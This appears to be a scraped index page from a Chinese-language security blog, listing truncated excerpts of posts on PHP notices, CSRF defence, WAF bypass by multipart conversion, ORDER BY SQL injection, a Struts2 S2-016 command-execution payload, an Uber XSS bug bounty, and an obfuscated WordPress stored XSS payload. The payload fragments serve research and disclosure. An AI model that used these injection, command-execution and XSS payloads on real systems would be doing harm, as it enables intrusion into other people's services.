Notice : Use of undefined constant 完美解决方案 — 解决办法

Notice : Use of undefined constant 完美解决方案 — 解决办法
Notice: Use of undefined constant ALL_PS - assumed 'ALL_PS' in E:/Server/vhosts/www.lvtao.net/global.php on line 50   Notice: Undefined index: EaseTemplateVer in E:/Server/vhosts/www.lvtao.net/libs/template.core.php on line 51   Notice: Use of undefined constant uid - assumed 'uid' in E:/Server/vhosts/www.lvtao.net/global.php on line 54 ...

PHP Notice: undefined index 解决方法 — 问题解决办法

PHP Notice: undefined index 解决方法 — 问题解决办法
时用$_GET[‘xx’] 取得参数值时,如果之前不加判断在未传进参数时会出现这样的警告: PHP Notice: undefined index xxx 虽然可以通过设置错误显示方式来隐藏这个提示,但是这样也有隐患,就是在服务器的日志中会记录这些提示,导致日志文件异常庞大! 下面是引用网上流行的解决方法: 首先,这个不是错误,是warning。所以如果服务器不能改,每个变量使用前应当先定义。...

CSRF 跨站请求伪造 攻击与防御 — CSRF防御策略

CSRF 跨站请求伪造 攻击与防御  —  CSRF防御策略
看过程能让你更了解如何的安全编码,看文中红字结果让你知道防范措施。 什么是CSRF 跨站请求伪造 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学...

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本
Post、Get数据包转为上传multipart/form-data格式数据包php脚本 说一下写这个工具的初衷吧。有很多时候某些程序接收参数的方式都是通用的,那咱们就可以利用这种方式来绕过WAF等验证来进行攻击。 只需要转换一下格式即可。 在线转换地址:https://woj.app/multipart.php Burp Post、Get数据包在线转换工具 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24...

MySQL Order By 注入总结

MySQL Order By 注入总结
oracle Order By 注入 desc,if( (select 1 from dual where 1=1*)=1 ,1,(select 1 from information_schema.tables)) desc MySQL Order By 注入 select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; abs(jjdm-(length(user())=23)*8000) 前言 最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直...

密码保护:SN — 另类执行Struts2命令 及 SQL注入

密码保护:SN — 另类执行Struts2命令 及 SQL注入
先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...

Uber Bug Bounty: Turning Self-XSS into Good-XSS

Uber Bug Bounty: Turning Self-XSS into Good-XSS
Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts. On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of...

WordPress全版本储存型XSS漏洞

WordPress全版本储存型XSS漏洞
漏洞发现者: SecJack 安全周@上海匡创 漏洞概述及危害 建站程序类型:php+MySql 漏洞类型:储存型XSS 缺陷文件: formatting.php 漏洞参数:<svg onload=alert('1')> ,(进行混淆) 代码如下: <svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([!...